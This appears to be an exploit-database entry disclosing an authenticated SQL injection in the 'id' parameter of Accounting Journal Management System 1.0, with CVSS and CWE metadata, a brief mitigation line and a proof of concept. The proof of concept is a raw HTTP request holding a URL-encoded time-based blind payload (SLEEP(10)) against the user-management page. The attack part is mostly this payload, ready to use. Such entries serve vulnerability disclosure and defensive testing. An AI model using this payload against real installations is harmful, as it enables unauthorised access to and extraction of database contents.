Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)

vendor:

Accounting Journal Management System

by:

Alperen Ergel

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Accounting Journal Management System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:sourcecodester:accounting_journal_management_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 Xammp, Kali Linux

2021

Accounting Journal Management System 1.0 – ‘id’ SQLi (Authenticated)

Authenticate and get update user settings will be appear the id paramater put your payload at there it'll be work

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.sourcecodester.com/php/15155/accounting-journal-management-system-trial-balance-php-free-source-code.html
# Version : 1.0
# Tested on: windows 10 xammp | Kali linux
# Category: WebApp
# Google Dork: N/A
# Date: 09.02.2022

######## Description ########
#
# 
#  Authenticate and get update user settings will be appear the
#  id paramater put your payload at there it'll be work 
# 
#
#
######## Proof of Concept ########

========>>> REQUEST <<<=========

GET /ajms/admin/?page=user/manage_user&id=5%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=r513r6hug9aqofhlfs3bc7f7qa
Upgrade-Insecure-Requests: 1